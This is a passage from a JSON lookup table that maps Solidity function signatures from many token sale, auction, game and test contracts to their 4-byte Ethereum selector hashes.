"0xb80d3181", "SoftCap()": "0xf0b53256", "ETHPrice()": "0x3732e153", "proposalDeposit()": "0x8b15a605", "hired()": "0x22bd6d3f", "country()": "0xd8b0b499", "generalRate()": "0xf4b79379", "startPreICOStage()": "0x651ed944", "dividendsBuffer()": "0x111a1fe9", "TotalSantaCoinsGivenByNorthPole()": "0x6c572104", "blocktime()": "0xa9b12c4c", "winning_month()": "0x2c011e7b", "tokenSaleCap()": "0x945aab47", "teamVestingPeriod()": "0xfcd14456", "priceDT()": "0x498fd833", "amountWagered()": "0xd4c80edf", "PrepareForSale()": "0x07660978", "LEGAL_EXPENSES_ADDR_2()": "0xabbcb24b", "BTCS_ETHER_CAP()": "0x01d1c7fd", "datestart()": "0x23e26c43", "is_active()": "0x1a8012e4", "payableEtherReceived()": "0x653fbca1", "piEndTime()": "0x122d9a8d", "maxPendingParticipants()": "0xb8c6a67e", "disableRefund()": "0x01501347", "givecandyfrom()": "0x073e1fa3", "SGTMock(address)": "0x0c584803", "LivepeerTokenFaucet(address,uint256,uint256)": "0x98e1a322", "finalizeInternal()": "0x7a85e031", "reclaimTokens(uint256)": "0x7760da7f", "setPhase1AccountTokensMax(uint256)": "0x69a68f5f", "updateWhitelist(address,uint8)": "0x4d399cb3", "hasSaleEnded()": "0x6bacc0fa", "killFaucet(address,address,string,address)": "0xf8c206b0", "revokeAccess(address,address)": "0x5f6ea340", "authorizeAccess(address,address)": "0x48f83e86", "requestAccess(address,address)": "0x01d0ac0b", "createFaucet(string)": "0x48ef245b", "getFaucetByName(string)": "0xf78525a1", "getFaucetByCreator()": "0x5358c119", "FaucetManager()": "0xf68036f0", "disableContract(address)": "0xa154ce82", "delegate(address,uint256)": "0x026e402b", "voteTime(uint256)": "0xcdf05ab5", "changeRules(uint256,uint256,uint256,uint256,uint256)": "0xdc718791", "LiquidDemocracyController(address,address,address,uint256,uint256,uint256,uint256,uint256)": "0x16e7371f", "accept_ownership()": "0xa67c2dcb", "reject(bytes32)": "0xcabd734f", "isValid(bytes32)": "0x6a938567", "delete(bytes32)": "0x4c87effd", "approve(bytes32)": "0xa53a1adf", "PartyRegistry()": "0x711cbc26", "myPledgeTo(address)": "0x02474c59", "cancelPledge(address)": "0xaa60145b", "createPledge(address,uint256,uint256)": "0x018aba3f", "canPledge(uint256,uint256)": "0x8808f3d0", "withdrawAsCreator()": "0xb9f89751", "withdrawAsSupporter(uint256)": "0x1aa260c0", "withdraw(bool,uint256)": "0x984c0450", "balanceAsCreator()": "0x62b83c6b", "balanceAsSupporter()": "0xf5d50f86", "getExpectedPayment(uint256)": "0x26d3325d", "currentPeriod()": "0x06040618", "Pethreon(uint256)": "0xa008d288", "getCurrentOwner(string)": "0xd55a772d", "executeByAction()": "0x9a7e9e1f", "WorkflowState()": "0xbebf10d5", "WithNoArgumentConstructor()": "0xbae2718f", "TokenGame()": "0xb92984f8", "claim_prize()": "0xb5f50ef3", "claim_tokens(address,uint256)": "0x2fdaf6af", "move_excess_for_bucket(uint256,uint256)": "0x78eef9d4", "close_next_bucket()": "0xe5333b5e", "escape(uint256)": "0x466985f3", "exponential_decay(uint256,uint256)": "0xe8071f30", "TokenDistribution(uint256,uint256,uint256,int256)": "0x87d9d224", "calculateDecayedBalance(uint256,address)": "0xb4ed3622", "CoinCrowdToken()": "0xbed43ffa", "transfer_ether(address,uint256)": "0xc4eb8ec2", "transfer_erc20(address,address,address,uint256)": "0x35e5f617", "Cocoon(address[],address,address)": "0x346223f5", "toText(bool)": "0xcaf19e5a", "testFloatArray()": "0xf5112373", "testSimpleArray()": "0x03dd5a18", "_createRole(bytes32,address[])": "0x995893e6", "createRole(bytes32,address[])": "0x9630961d", "validContract(address,uint32)": "0xd035bed4", "sendMoney(uint32)": "0x58a356d0", "allowWorking(uint32)": "0x282440ed", "EmployeeWallet(string)": "0xdb63e149", "VeteranCoin(uint256,address)": "0xb2d318f7", "setClue(string)": "0x0840972b", "getClue()": "0x3c4c51c9", "ConstructZCashClue(bytes32)": "0xdfd17111", "markTaskCompleted(address,bytes32)": "0x40b359f5", "getTaskListSize()": "0x828ca03c", "getTaskFromToken(bytes32)": "0xeeaa75b9", "getTaskKeyAtIndex(uint256)": "0x37180750", "getTaskAddress(bytes32)": "0xeff24744", "getTaskAtIndex(uint256)": "0x0b7507ae", "addTask(bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32,bytes32)": "0x660dee82", "query()": "0x2c46b205", "__tinyOracleCallback(uint256,bytes)": "0xb29f731d", "finalizePresale()": "0xa0a6e940", "addPresale(address,uint256)": "0xad5e2cd0", "getPurchase(uint256,uint256)": "0x3bc70184", "processPurchase(address,address,uint256)": "0xe696d10d", "add(address,address)": "0x52c28fab", "ProcessablesMock()": "0x338e22ff", "getTotalFeeStake()": "0x5c3cdec8", "redeemInternal(address,bool)": "0x1ac4754b", "missingFundsToEndAuction()": "0xc5cd88db", "init(address,uint8,uint256,uint256,uint256,uint32,uint256)": "0x8c73596c", "DutchAuctionPoD()": "0xde5cb7ed", "containsToken(address)": "0x733d8053", "recoverPrice(address,address)": "0xccf7ba0f", "changeEscapeController(address)": "0x961891d5", "Bytes32Oracle(bytes32)": "0xa9636b9f", "update(int256)": "0x6299a6ef", "Int256Oracle(int256)": "0x2f6e2711", "claimDaoStakeSupply(address)": "0xe1134799", "claimDevReward(address)": "0x6e761a73", "endMigration()": "0x6c525d04", "getCreditbitAddress()": "0x72561235", "setCreditbit(address)": "0x1030c539", "setCreditMCCurator(address)": "0x4fc0ee17", "confirmVestingSchedule(uint256,uint256,uint256,uint256)": "0x4ed600d1", "LOCKEDiN()": "0xf6bea5dd", "kTikTakCoin()": "0x94fe6ed1", "VirgoContract()": "0x42c87205", "CESCoin(uint256,string,string)": "0x4e02ed40", "PROM()": "0xcfb7b9e9", "KittyCoins()": "0xfc8fc6f7", "ThingsbookChain()": "0x636a36e3", "STANToken()": "0x23985742", "EstateX()": "0xec46009d", "sendWinnings()": "0x41d09fbe", "DeliverToken()": "0xe7930d21", "vvc(uint256,string,string)": "0x353ba8e9", "PaytherToken()": "0x2048e5f7", "DIGC(address[],uint256[])": "0x0e1f6d3b", "changeLocked()": "0x36a2f0f1", "createHeldCoins()": "0xc33a800b", "removeExchangeTestAccounts(address,address)": "0x11daea9c", "addExchangeTestAccounts(address,address)": "0xd917863e", "ICONIC_NIC(uint256,string,string)": "0xc6a98543", "DZoneCoin(uint256,string,uint8,string)": "0x88b11ee2", "Amorcoin()": "0xacd4e110", "comminglerSellsProductSKUWithProRataIngred(address,uint256,string,uint256,string,string)": "0x483eef18", "transferAndWriteUrl(address,uint256,string)": "0x8829a5a7", "genAddressFromGTIN13date(string,string)": "0x428c91ae", "sellsIntermediateGoodWithDepletion(address,uint256,string,uint256)": "0xb689ca61", "sellsIngrWithoutDepletion(address,uint256,string)": "0x9ec12cfa", "certAuthIssuesCerticate(address,address,uint256,string,string,string,string,uint256)": "0xf07b9a04", "farmerRequestCertificate(address,uint256,string,string,string,uint256)": "0x0f264e1a", "InGRedientToken()": "0x6a570b98", "sendDividends()": "0xa8fc32de", "deposit(uint8)": "0xebe41b73", "MAYA()": "0xf080f860", "withdrawCerneuTokens(address)": "0x9ee484ce", "transferDomain(bytes8,string,address)": "0x3149c440", "registerPage(bytes8,string,bytes32,string)": "0xf76bf757", "registerDomain(bytes8,string)": "0xca263a49", "registerZone(bytes8)": "0x4b96b0ee", "W4T()": "0x63b8f7f7", "ZAI()": "0xc30df586", "KanCoin(address)": "0xb3e83761", "releaseFund(address)": "0x4d13507d", "fund(address,uint256)": "0x7b1837de", "releaseTeam()": "0x4dbc355a", "CarParkCoin()": "0x58f94f13", "_getPrice(uint256,uint256)": "0x28e36ab8", "_buyRank(address,uint256)": "0x89897104", "_buyNextRank(address)": "0x8dcd555f", "_receiveBuyRank(address,uint256)": "0xf0bae787", "_receiveBuyNextRank(address)": "0x03fba444", "editRank(uint256,uint256,uint256)": "0x95c0d65c", "addRank(uint256,uint256,uint256,string)": "0x37e822b8", "UserRank(address)": "0xe261fc63", "BAI20()": "0x848faed7", "MANHATTANPROXY1STST()": "0xdf752519", "updateTokenPricePerUSD(uint256)": "0x369e2422", "getBonus(address)": "0x3a740a63", "BittechPresale(address)": "0xb2f094de", "returnBids(uint256,address)": "0x4592fec8", "finalizeAuction(uint256)": "0xe8083863", "incrementBid(uint256)": "0xd6e8a0b0", "createCommonAuction(uint256,string)": "0xdc4a307c", "createRareAuction(uint256,string)": "0x6197bbab", "createLegendaryAuction(uint256,string)": "0x8670e183", "_createAuction(uint256,string)": "0x225ce00f", "_startAuction(uint256)": "0xd32b8575", "totalAuctionsCount()": "0x8f63534a", "playerId(uint256)": "0x67f8df84", "_setPlayerId(uint256,uint256)": "0x3aa2ad63", "_mintToken(uint256,string,address)": "0x7ed273e9", "RDFToken()": "0x0c131629", "emergencyTokenDrain(uint256)": "0x660b24b4", "triggerAirDrop(address[],uint256)": "0x20909455", "getSell()": "0x1af526b0", "getBuy()": "0x30e664f6", "GoramCoin(uint256,string,uint8,string)": "0xbe4a90eb", "WeiToken()": "0x5f9973b9", "ECNcoin()": "0x33eb647f", "GoldMineChain(uint256,string,uint8,string)": "0x9215b58e", "BSAFE()": "0x71c02b7b", "findLover(address)": "0xbe5df6cb", "createLover(string,string,string)": "0x59e4c4ca", "GreenworldFarmToken()": "0x463c75b3", "withdrawERC20Token(address,uint256)": "0x928d81c1", "setTradingLive()": "0x9561f0d8", "setBypassStatus(address,bool)": "0x4fa88720", "DIYTubeCoin()": "0xc21fcffb", "TPP2018TOKEN()": "0x4ba26466", "MoreAI()": "0x38331353", "priceOf(uint32)": "0xe0b3cc90", "ownerOf(uint32)": "0x23b7ec3b", "_approx(uint256)": "0x031126e1", "_shareProfit(uint256,uint256,address)": "0xff0a22db", "_shareDiscountPrice(uint256,address)": "0xd3c8e99e", "discount(uint32,uint256)": "0x80b57824", "purchase(uint32)": "0xc7f04e65", "getPerson(uint32)": "0xab87d816", "createPerson(uint32,string,uint256)": "0x9de7d032", "CryptoChamps()": "0xcc8ce27e", "RollLottery(uint64)": "0x37603132", "getDetailedPollResults(uint256,uint256)": "0xa84524a4", "getCurrentNbVote()": "0x0243aa1b", "createNewPoll(string,uint256,uint256,uint256)": "0x3819986e", "PTYC(uint256,string,string)": "0xea014645", "HIcToken(uint256,string,string)": "0x287dd8d2", "SVEToken()": "0xadc84a42", "CompShare1()": "0xedc93066", "getTarget(string)": "0xda1b620b", "set0xExchangeWrapper(address)": "0x50e4b069", "setOracleRegistry(address)": "0x8165354e", "setB0xToken(address)": "0xa9974338", "setDebugMode(bool)": "0x8811e191", "setB0xAddresses(address,address,address,address)": "0xd4eb4186", "replaceContract(address)": "0xfb08fdaa", "_replaceContract(address)": "0x95d84b30", "buildLoanOrderStruct(bytes32,address[6],uint256[9])": "0x854254e8", "boolOrRevert(bool,uint256)": "0x0e1a0217", "intOrRevert(uint256,uint256)": "0x028e6c67", "voidOrRevert(uint256)": "0xc717e9eb", "testegy()": "0x7dcb6b92", "DoxCoin()": "0x27806a16", "transferAdvisorToken(address,uint256)": "0x05fec4be", "transferBonusToken(address,uint256)": "0xa14d427a", "unregisttIcoAddress(address)": "0xc3858e82", "registIcoAddress(address)": "0xb895c813", "vxtest()": "0xa9a3a9c5", "RATEotu()": "0xe05ee7a4", "joinwithreferral(address)": "0x3be2b60c", "updateFileds(uint256,uint256)": "0xf67f83a8", "Umint21()": "0x9690caa6", "MassivelyMultiPlayerOnlineVideoGames()": "0x30bd2ba9", "setKyberProxy(address)": "0xc6c3f3f9", "calcRateFromQty(uint256,uint256,uint256,uint256)": "0x42dfb036", "info(bytes32)": "0xb64a097e", "enabled()": "0x238dafe0", "getCrowdsaleUniqueBuyers()": "0xf716c400", "addONG_AUDIT(bytes32,string,string)": "0x3e0a7ab5", "GestiToken()": "0x44bd7186", "self_readyTime()": "0xef9e7f95", "view_readyTime(address,address)": "0x275f3d92", "play_stone()": "0x53bc7399", "play_scissors()": "0x99878d5b", "play_paper()": "0x79abb2f5", "asyncSendSilently(address,uint256)": "0x245f57a9", "enableImpairedTokenContract(address,bool)": "0xfd89a9b5", "adminMode(bool)": "0x6930a7e9", "enableTokenTransfer(bool)": "0x35216bba", "claimRewardBy(address,uint256,string)": "0xff1ad7fa", "MomaSpace()": "0x0563d55e", "ConsoToken()": "0xa866665a", "CloseSale()": "0xbd998dc8", "getDonation(address)": "0x410a1d32", "TokenBalance()": "0xa9bfe5c7", "DonateEther()": "0xf87394d6", "setPonzi(uint8,uint256)": "0x4aab8c14", "like(address,address,uint256,string,address)": "0xd509b1f9", "TestJ()": "0x5cc373c7", "claimRewardTo(address,uint256,string)": "0x9d79468a", "unRegisterCampaign(uint256)": "0x686d5e00", "registerCampaign(uint256,address)": "0x5693077a", "isCampaignRegistered(uint256)": "0x583be14e", "Kolak()": "0x71cce314", "XiaoMuMuToken()": "0xea30e2e6", "addCard(string,string,uint8,string,string)": "0xf994bffa", "deleteThisContract()": "0xefb1900d", "setminimumAmount(uint256)": "0xf9c3a68e", "sendHash(string)": "0xdfb29935", "KingJamesToken()": "0x2d969204", "updateDealConditions(uint256,uint32,uint32,bool,uint256)": "0xe64a4e27", "processPayment(uint256,uint32,uint32,uint256)": "0xaab9f165", "refundPayment(uint256,uint32,uint32,uint256,string)": "0x8467d9cf", "cancelOrder(uint256,uint32,uint32,uint256,string)": "0xac1a13fb", "securePay(uint256)": "0x4153d65b", "addOrder(uint256,uint256,address,address,uint256)": "0x3c168093", "recordDealRefundReason(uint256,address,uint32,uint32,uint256,string)": "0x188c668c", "recordDealCancelReason(uint256,address,uint32,uint32,uint256,string)": "0xa0e5e821", "recordDeal(uint256,address,uint32,uint32,bool,uint256)": "0x5d818e6b", "MerchantDealsHistory(string)": "0x4b2c2596", "getBundleExpiredTimeOfEmail(string,uint8)": "0xa9d23ace", "purchaseBundle(uint8,string)": "0x1b7f00c1", "registerEmail(string)": "0x09ba4a4a", "transferOwnerShip(address)": "0x8863dd1a", "VEToken()": "0x22fec5e7", "Nut(uint256,string,uint8,string)": "0x3e8cfa26", "blockhashOf(uint256)": "0x07518c8e", "nicknameOf(uint256)": "0x54f50f1b", "firstToken(address)": "0x6f37f48b", "hasTokens(address)": "0x3cefc1e0", "setNickname(uint256,bytes32)": "0x202c413d", "mint(bytes32,uint256,bytes32)": "0x40786dec", "colorplat()": "0x05a3823b", "_removeTokenFromOwnersList(address,uint256)": "0xe2fa6f90", "_addTokenToOwnersList(address,uint256)": "0x06991539", "change_metadata(uint256,string)": "0xaea6022c", "ownerOf()": "0x0605062f", "Creative()": "0xef6f8e92", "StartAuction(string,uint256)": "0x4fc5a549", "FraCoinAuct(string,uint256,address)": "0x5d2dc5fa", "Ethlyte()": "0x0ce8544a", "LAPTOPTOKEN()": "0x2d467358", "ReviewToken(uint256,string,uint8,string,address)": "0xd5547587", "recover(bytes32,uint8,bytes32,bytes32)": "0xc2bf17b0", "recoverAddressOfSigner(address,address,uint256,uint8,bytes32,bytes32)": "0xcf14b191", "stake(uint256,address)": "0x7acb7757", "m_record(string)": "0x7ad1428d", "disown(string,address)": "0xb5754045", "hasClosed()": "0x1515bc2b", "TimedCrowdsale(uint256,uint256)": "0x0944e35d", "SafecontractsTREXFund()": "0xde917978", "withdraw(bytes32,address,uint8,bytes32,bytes32)": "0xcc8f0b48", "verifyTransferSignature(bytes32,address,uint8,bytes32,bytes32)": "0x30d86516", "verifySignature(address,address,uint8,bytes32,bytes32)": "0x3dabb0f6", "cancelTransfer(bytes32)": "0xb329bf5c", "getSentTransfer(uint256)": "0xf140b8ea", "getSentTransfersCount()": "0xb28c747d", "getTransfer(bytes32)": "0x260958a5", "withdrawCommission()": "0x3e25e837", "changeFixedCommissionFee(uint256)": "0x7297be7f", "deposit(address,bytes32)": "0xb9e1aa03", "VerifiedProxy(uint256)": "0x6b71d93b", "setMagicNumber(uint256)": "0x2ba2ed98", "getMagicNumber()": "0x59ff5b55", "setMonkey(string)": "0x0a7a37bc", "getMonkey()": "0xaa183877", "Examples()": "0x001f4701", "setApiAddress(address)": "0xc20652fe", "apiAuthorized()": "0xebb1b7ed", "changeVotingRules(uint256,uint256)": "0x158059e2", "Manifesto(uint256,uint256)": "0xab209e23", "setShares(address,uint256)": "0x8bccbf62", "transfer_token(address,uint256)": "0x4d25cc91", "_transfer_token(address,address,uint256)": "0x486c363d", "getColour()": "0x216ec69b", "setColour(uint8,uint8,uint8)": "0xd1aadb6a", "BlankCanvas()": "0xef051f0c", "contribute(address,address)": "0x07db37e7", "contributeLocal()": "0x42111339", "setTransferable(bool)": "0x9cd23707", "getElevations()": "0x049b7852", "ArrayPasser(uint8[9])": "0xb873846f", "test_twoTrueAndFalseAssert()": "0xe5e38fc7", "test_threeTrueAssert()": "0x9d86fd0c", "test_threeFalseAssert()": "0x72460869", "test_oneFalseAssertNoMessage()": "0xb1429863", "test_oneTrueAssertNoMessage()": "0x05c31491", "test_twoFalseAssertNoMessage()": "0x8b42ad37", "test_twoTrueAssertNoMessage()": "0xf8a39a6e", "doTransfer(address)": "0xe662bd25", "testNetworkDeployment()": "0x4a363fbc", "throwsWhenTransferingFundsDuringSale()": "0x86fa18df", "testFundsAreLockedDuringSale()": "0x0244eb3f", "testFundsAreTransferrableAfterSale()": "0xe1b8347b", "testTokensAreTransferrableAfterSale()": "0x8d062046", "throwsWhenTransferingDuringSale()": "0xeb3b6891", "testTokensAreLockedDuringSale()": "0x4b43dc51", "throwsWhenGettingTokensWithEndedSale()": "0x92af7ce0", "testCantBuyTokensInEndedSale()": "0xb9beadae", "throwsWhenGettingTokensWithStoppedSale()": "0x496c5ad8", "testCantBuyTokensInStoppedSale()": "0xb0604a9c", "testEmergencyStop()": "0x033f7bc9", "throwsWhenGettingTokensInNotInitiatedSale()": "0x51b488d4", "testCannotGetTokensInNotInitiatedSale()": "0xd68fbe5c", "testAllocatesTokensInSale()": "0x12a8c1ed", "testHasCorrectPriceForMultistage()": "0x48b5b15c", "testHasCorrectPriceForStages()": "0x9116ee03", "TestMath()": "0xe4723828", "distributeIfNeeded(address,uint256)": "0xc573e6bd", "PlutonDistribution()": "0x490a65c8", "emitRecovery(address,address,address)": "0xea14457e", "emitApprove(address,address,bytes32,uint256)": "0xd54c8c87", "emitOwnershipChange(address,address,bytes32)": "0xa9612f72", "emitRevoke(bytes32,uint256,address)": "0xc70bbc13", "emitIssue(bytes32,uint256,address)": "0xabafaa16", "emitTransfer(address,address,bytes32,uint256,string)": "0x515c1457", "Cashier()": "0xb85f726a", "connectorTokenCount()": "0x71f52bf3", "contractSize(address)": "0xeb67cee8", "noThrowCall(address,bytes4)": "0xf86cd33d", "determineInterfaceImplementationStatus(address,bytes4)": "0xefe3f4f4", "getInterfaceImplementationStatus(address,bytes4)": "0x26e137c2", "interfacesSupported(address,bytes4[])": "0x91e22c90", "eip165Supported(address)": "0x902eded3", "interfaceSupported(address,bytes4)": "0x83d53895", "IEIP165()": "0x7cb4e22a", "limitedDeposit()": "0x86f3d0cd", "SmallInts()": "0x520bf4d8", "removeReputation(address,uint256)": "0xb066d3b7", "addReputation(address,uint256)": "0xe24f8313", "reputationOf(address)": "0xdb89c044", "setICOElePrice(uint256)": "0x02690ef0", "deleteChannel(address,address,address)": "0xd4d6f5ee", "newChannel(address,uint256)": "0xf26c6aed", "getChannelWith(address)": "0x238bfba2", "tokenAddress()": "0x9d76ea58", "nettingContractsByAddress(address,address)": "0xfbdc03fe", "getChannelsParticipants()": "0x0b74b620", "getChannelsAddresses()": "0x6785b500", "ChannelManagerContract(address,address)": "0x40ca925d", "info(uint256)": "0x2e340599", "top()": "0xfe6dcdba", "totalEthReleased()": "0xb2dda6b5", "random_number()": "0x60a59bdb", "tokenVendor1()": "0xed9a6a65", "receiver1()": "0xd6c7b4ad", "totalTokensForSold()": "0xbe6872af", "lastSignedTimestamp()": "0x09339f2e", "addressDividendReserve()": "0xcd41ada1", "kernel()": "0xd4aae0c4", "etherPriceInUsd()": "0xc3a11c51", "ownerAddr()": "0x9c675eaa", "pMinInFp()": "0xec6b16ca", "icoTokenAmount()": "0x1fcdfe14", "minEth()": "0xf1fb3ace", "respectRequiredToRecruit()": "0x7c116ec9", "addrDevelopment()": "0x4fc573c7", "maxMask()": "0x2a8d1c61", "toOwner()": "0x607b9169", "globalBet()": "0xcda113ed", "FOUNDERS_TOKENS()": "0x65f6d6a2", "getENow()": "0xdd75e7ff", "solver()": "0x49a7a26d", "sumVote()": "0x6cbef5a7", "firstYearEnd()": "0x8402ac99", "changePhaseToICOweek2()": "0xe78631fb", "tokenSafe()": "0x1c4fda10", "developerFundAddress()": "0xa237f4d8", "increasedPrice()": "0x2c34ce05", "MAX_TOTAL_CONTRIBUTIONS()": "0x1f390975", "unlockPurchasedTokensClaim()": "0xc10b30c0", "timeTier3()": "0x360ff695", "presaleToken()": "0x24ffea1a", "RATE_TIER1()": "0x7b283b71", "presaleEth()": "0xd6b8ec66", "jackpotSize()": "0x57246d23", "minimumTargetReached()": "0x8dc71928", "CapLevelPrice()": "0xc3bd0bae", "foundationVestedPayment()": "0xf5d05f7e", "max_users()": "0xb03645b5", "markAllRead()": "0x895f468b", "winBrickReturn()": "0x6b2a2691", "goalAchieved()": "0x0f7a4590", "getMax(uint64[])": "0xeb7fabd7", "marketCap()": "0x2c135b93", "accumulated()": "0x7a044323", "_maxtotalSupply()": "0x6c8830c5", "preSaleLockEndTime()": "0xc040188f", "icoTokensLeft()": "0x04f92405", "sumICOStage6USD()": "0xc2c546b8", "fundingStart()": "0xbcde18f1", "drainTokens()": "0xef1706ce", "claimedYesterday()": "0x87bfce9e", "FOUNDATION_TOKENS()": "0xe7074de2", "getAstrosLength()": "0xe334cd92", "bonusStage2FirstDay()": "0x1128b59e", "isFreeTransferAllowed()": "0x3a134c00", "MAX_INVEST_SHARE()": "0xe28ab336", "minCapReached()": "0x8b9add74", "tokenSaleIsFinished()": "0xcf124ba3", "Application()": "0x62a36a54", "mainSaleEndDate()": "0x42e5033e", "tokensaleStartTime()": "0x4fee2437", "havedCrowdCoin()": "0xa91a39ad", "crowdsaleConcluded()": "0x00c988e8", "tokensSoldPre()": "0x426b7113", "currentMigrationTarget()": "0x4ad0a529", "factory()": "0xc45a0155", "standFeeAfter500()": "0xae602223", "withdrawSyndicateTokens()": "0x41f77260", "gameEnds()": "0xa378bba5", "freezeEnabled()": "0x5d82ddc8", "delayOfICOEND()": "0x21ea2b8d", "transfersBlocked()": "0x53179413", "FOR_SALE()": "0x74467a1e", "mintTap()": "0x0e8b3971", "Start8()": "0x0d1edad1", "minOVC()": "0x44431e52", "withdrawToTeam()": "0xfcc21e56", "currentCirculating()": "0x51a784e3", "periodPreICO()": "0x524559a3", "mcrAmmountForGas()": "0x67da299b", "ico1receivedTotal()": "0x24c0db84", "acceptedToken()": "0x451c3d80", "secondTTax()": "0xe8ad7bcc", "bountyProgam()": "0xabdf9bda", "signedTransferFromSig()": "0xc14a932f", "_kittenContract()": "0x57b69e72", "xIPFSPublicKey()": "0xe2298591", "TLN_TOKEN_SYMBOL()": "0x1e85e8f0", "nextMintPossibleDate()": "0x4ff30c5f", "addrLockedFunds()": "0xe20de6eb", "coinsPerEth()": "0x20a168b1", "userNumber()": "0x2b4e8413", "_allowManualTokensGeneration()": "0x1ea06b9e", "_finalSupply()": "0xca482849", "ICONIQ_SALE_OPENING_TIME()": "0xdba72a4e", "totalEthHandled()": "0xde4f4d2b", "basePublicPlacement()": "0x3d619212", "lpBidPrice()": "0x3d20e09e", "lockstatus()": "0xf0947680", "TOKEN_PRICE_D()": "0x0d2806ad", "indice()": "0x556e6edc", "hardCapCHF()": "0x185c4279", "pausedB()": "0xf371ec49", "numberOfIndex()": "0x2168ca06", "culmulative_demurrage_collected()": "0x7fe275d4", "TransCompleted()": "0x1c67a7aa", "gbtAddress()": "0x1e215f70", "ethIN()": "0xc4c59c77", "isCheckStage()": "0xb23d36b0", "pendingAmount()": "0xba1066ed", "crowdsaleEnd()": "0x4d9aa424", "we_token()": "0xbc8aa899", "sumHardCapICOStage4()": "0xad5f3433", "IPFSHash()": "0x93e67bff", "getMinimumWishTribute()": "0x07e35246", "objective()": "0x14f1586a", "nextMintTime()": "0x8c4e8c21", "running_id()": "0x7cb04b87", "preIcoFinishTime()": "0x31fb4c1d", "investorIndex()": "0xe23e3229", "futureFundingBalance()": "0x2e3a71d5", "crowd_start_date()": "0x7b015ff7", "CREATE_VERSION_ROLE()": "0xaa61924a", "DeathFactor_i()": "0xd074443f", "hasRequestedForMigration()": "0x67f690b5", "price2()": "0x27a3181d", "reward6()": "0x23dc33b9", "t_ImmlaTokenDepository2()": "0xcd5e2038", "tellTime()": "0x79a37bd0", "profit5eggs()": "0x8a127931", "futureFundingWalletAddress()": "0x10fae6f4", "roundNum()": "0x119b22b3", "periodPreITO_hardCapInUSD()": "0x940064e3", "devWithdrawn()": "0xa1943113", "ancestorBuffPercentage()": "0x85bbb53a", "FIRST_AUCTIONS_MINIMUM_RAISE()": "0x108456b4", "centsInPhaseOne()": "0x84bdaf85", "unlock20Done()": "0x967743a8", "BATTLE_POINT_DECIMALS()": "0x3abdf792", "REQUESTED_STATUS()": "0x14a6a1a5", "posShare()": "0xaaa7062b", "purchasedTokensRaisedDuringPresale()": "0x29516ba7", "teamCompanyLock()": "0x16d4db19", "currentNetfRound()": "0xf089e972", "presale3_startdate()": "0x55f413c9", "seventhTeamWithdrawal()": "0x4b05de75", "altarCut()": "0x27bb020a", "MARGIN_SPLIT_PERCENTAGE_BASE()": "0x2db237bb", "getCurrentICOPhase()": "0x91f6c7e6", "levelOneTokenNum()": "0xc8435ba2", "merculetContract()": "0xdc0d4cb6", "icoTimeStart()": "0x05c85c42", "MAX_ENTRIES()": "0x7d4cb964", "discountedSaleDuration()": "0x0566c02a", "readAllUsers()": "0x09e9e85b", "window1EndTime()": "0xdc85b996", "signer2_proposal()": "0x3476aeb0", "emergencyManager()": "0xd2c18f59", "totalEthJackpotCollected()": "0x3f74a8be", "foundersAllocation()": "0x1db580fa", "MINING_POOL_AMOUNT()": "0x431bff74", "numberOfVotes()": "0x0e7d490d", "mintPriceBuffer()": "0xc1c64ecf", "stockSet()": "0x9456e5b5", "bonusRoundId_()": "0x4be36323", "gameManagerSecondary()": "0x1740b479", "RESERVED_COMPANY_UNLOCK_AT()": "0x47e2b978", "newAddress()": "0xccdb3f45", "author1()": "0x013ed428", "endFirstPeriodTimestamp()": "0xc6f3a895", "teamAccount()": "0xd05ee727", "openDate()": "0xec8cb281", "checkDone()": "0xe0e848c0", "bipedaljoe()": "0xd56a0a88", "windowBonusMax()": "0x465aaeb7", "cryptaurBackend()": "0x3ae69708", "UsersList()": "0x33f7c9fe", "inPresale()": "0x7d2402d6", "rafEnd()": "0xb624fc54", "kickcityWallet()": "0x1cc0eb83", "platformOperatorNeumarkRewardShare()": "0x32139a0e", "ShitCloneslordAddress()": "0x34d95bf0", "totalPayout()": "0x454f7b8f", "getDelegates()": "0xc838ccb6", "founderToken()": "0x7479b9ac", "firstDayCap()": "0x5ab47550", "TransID()": "0x99eb975c", "scalingFactor()": "0xed3437f8", "convert10MTI()": "0x78a7e17d", "totalAirDrop()": "0xfb6b18c0", "withdrawedCoummunityCounter()": "0x27a8890e", "rescueAccount()": "0xc1c0e046", "ethPriceInEuroCent()": "0x1c4ef6c2", "isInterestStatusUpdated()": "0x6358aac0", "appreciationRateWei()": "0xef5121b3", "agents()": "0x58516661", "prevXRPCToken()": "0x9f2e7ce3", "holdAddress3()": "0x5abfafe2", "suspendDeposit()": "0x7f8fdcfb", "REF_CREDITS_PER_AXIE()": "0xa6df0344", "CoinyMcCoinface(uint256,string,uint8,string)": "0x4435947c", "give(address[],uint256)": "0x9f98df30", "UWC()": "0x1399cc5b", "MinerToken()": "0xf11a97ef", "setContractHoldBalance(uint256)": "0xb08f8e1d", "callTokenFallback(address,address,uint256)": "0x96edb898", "hashDelegatedTransfer(address,uint256,uint256,uint256)": "0xb1a7c005", "delegatedTransfer(bytes,address,uint256,uint256,uint256)": "0x0b948684", "GIFTToken(uint256,string,uint8,string)": "0xfab0568c", "readFromCart(uint256)": "0x8f3bab85", "getCartLength()": "0xc63a4e05", "InterestTest(address,address)": "0x4623beb6", "FTNTCoin()": "0x0832cf68", "BNC(address)": "0xc03ba041", "buyTokensForSelf()": "0x8057b96d", "buyTokensForAddress(address)": "0x37b54140", "logoutUser(address)": "0x09df5060", "loginUser(address)": "0x6bbeb9de", "alterBankBalance(address,uint256,bool)": "0x176b866f", "isDAppReady()": "0xce04a8c5", "assureDAppIsReady()": "0x5f6edff8", "ICOSplit()": "0xfa4d300d", "checkSplitEnd(uint256)": "0xceb44d04", "splitProfits()": "0x0d294629", "getPricePerToken()": "0xca1e9738", "setPriceOfEther(uint256,string)": "0xb6ed3308", "emergencySplitToggle()": "0x927bcac3", "emergencyThaw()": "0x309593ee", "emergencyFreeze()": "0xf3d4b942", "assetThaw()": "0x8ce450de", "assetFreeze()": "0x01b98853", "checkMonthlyLimit(address)": "0x369cbbb4", "checkCooldown(address,address)": "0xcdcf5794", "transferToSelf(uint256,bytes)": "0x85174a31", "WeBetCrypto()": "0x90a25f28", "EthPenis()": "0x4d882c97", "countTeam()": "0x95bad022", "deleteTeam(bytes32)": "0x39c9ffe3", "readTeamByIndex(uint256)": "0x20f5a0b9", "readTeam(bytes32)": "0x26d64f3b", "TeamContract()": "0xc0012077", "RiptideCoin()": "0x9c6a5bca", "validUpgradeId(uint256)": "0x47751b98", "validUnitId(uint256)": "0x4677fe53", "startRareRaffle(uint256,uint256)": "0xda7d57f9", 